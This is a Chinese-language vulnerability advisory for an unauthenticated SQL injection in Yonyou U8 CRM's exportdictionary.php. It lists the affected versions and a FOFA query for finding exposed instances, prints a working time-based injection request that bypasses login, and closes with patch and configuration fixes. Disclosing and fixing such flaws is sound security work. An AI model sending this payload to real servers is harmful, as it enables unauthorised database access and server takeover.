0 免责声明
请注意,使用本文章提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。
1 漏洞名称
用友U8-CRM-exportdictionary-sql注入
2 产品介绍
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
3 漏洞威胁
用友 U8 CRM客户关系管理系统 exportdictionary.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
影响范围:
V16.1, V16.0, V15.1, V15.0, V13
4 漏洞环境
FOFA:
title="用友U8CRM"
5 漏洞复现
PoC
GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Connection: close
sqlmap验证
6 修复建议
第一步:在配置文件尾部追加如下段落即可
配置文件: U8SOFT\turbocrm70\apache\conf\httpd.conf,
在末尾添加一个配置:
Require local
其中,需要将中的u8安装路径修改为正确的安装路径
第二步:U8CRM存在SQL注入漏洞的安全补丁240828.zip
将解压文件中的U8SOFT目录覆盖产品安装目录。
第三步:修改完之后重启Apache4TurboCRM70服务
